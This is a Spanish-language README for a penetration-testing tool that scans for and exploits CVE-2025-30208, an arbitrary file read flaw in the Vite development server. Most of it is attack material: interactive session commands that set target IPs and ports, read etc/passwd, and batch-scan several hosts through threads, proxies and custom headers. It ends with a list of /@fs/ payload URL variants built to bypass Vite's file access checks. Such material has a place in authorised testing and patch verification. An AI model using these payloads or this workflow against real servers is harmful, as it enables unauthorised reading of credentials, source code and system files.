
CVE‑2025‑30208 es una vulnerabilidad de gravedad media de lectura arbitraria de archivos en el servidor de desarrollo de Vite (una popular herramienta de compilación para frontend)
Escáner de vulnerabilidades avanzado para CVE-2025-30208 con características de nivel empresarial
Herramienta profesional de pruebas de penetración para la detección de la vulnerabilidad de lectura arbitraria de archivos en Vite
🚀 Inicio Rápido • 📋 Características • 🔧 Uso • 📊 Ejemplos • 🛡️ Seguridad
Este es un escáner de vulnerabilidades integral diseñado para detectar y explotar la vulnerabilidad CVE-2025-30208 en los servidores de desarrollo de Vite. La vulnerabilidad permite el acceso de lectura arbitraria de archivos a través de los endpoints del sistema de archivos de Vite, pudiendo exponer archivos de configuración sensibles, código fuente e información del sistema.
La herramienta ahora cuenta con una arquitectura modular para un mejor mantenimiento y extensibilidad:
CVE-2025-30208.py - Aplicación principal del escánerpayloads.py - Payloads avanzados de explotación (más de 60 variaciones)sensitive_files.py - Base de datos integral de archivos sensibles (más de 200 archivos)html_template.py - Plantilla mejorada de informes HTML estilo hackerpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# Enable verbose mode for detailed output
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[Press Enter twice to finish]
CVE-2025-30208 > scan
# Configure proxy
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# Set custom headers
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# Configure rate limiting
CVE-2025-30208 > rate
Enter rate limit: 1.0
# Generate beautiful HTML report
CVE-2025-30208 > pull
# Start web server to view report
CVE-2025-30208 > web
# Start web server on specific port
CVE-2025-30208 > web 8081
# Stop web server
CVE-2025-30208 > web off
| Comando | Descripción | Ejemplo |
|---|---|---|
set <option> <value> | Establece opciones de configuración | set RHOST 192.168.1.100 |
show options | Muestra la configuración actual | show options |
edit | Editor interactivo de opciones | edit |
run / exploit | Ejecuta la prueba de vulnerabilidad | run |
batch | Escanea múltiples objetivos por lotes | batch |
scan | Descubre archivos sensibles | scan |
pull | Exporta los resultados a HTML/JSON | pull |
web [on|off|port] | Servidor web para informes HTML | web 8080 |
save | Guarda la configuración de la sesión | save |
load | Carga la configuración de la sesión | load |
test | Prueba la conectividad con el objetivo | test |
validate | Valida la configuración actual | validate |
verbose | Alterna el modo verbose | verbose |
proxy | Configura los ajustes de proxy | proxy |
headers | Establece cabeceras HTTP personalizadas | headers |
rate | Configura el límite de tasa | rate |
log | Muestra la información de registro | log |
help / ? | Muestra la ayuda | help |
exit / quit | Sale de la herramienta | exit |
| Opción | Descripción | Por Defecto | Validación |
|---|---|---|---|
RHOST | Dirección IP/host del objetivo | - | Validación de hostname/IP |
RPORT | Número de puerto del objetivo | - | Rango de puertos (1-65535) |
FILEPATH | Ruta de archivo a probar | etc/passwd | Validación de ruta |
PROXY | URL de proxy HTTP/HTTPS | - | Validación de formato de URL |
VERBOSE | Habilita la salida verbose | false | Validación booleana |
RATE_LIMIT | Retraso entre solicitudes (segundos) | 0.3 | Validación numérica |
THREADS | Número de hilos para el escaneo por lotes | 5 | Validación de entero |
TIMEOUT | Tiempo de espera de solicitud (segundos) | 5 | Validación de entero |
CUSTOM_HEADERS | Cabeceras HTTP personalizadas (JSON) | {} | Validación de formato JSON |
El escáner ahora utiliza más de 60 variaciones de payloads organizadas en payloads.py:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8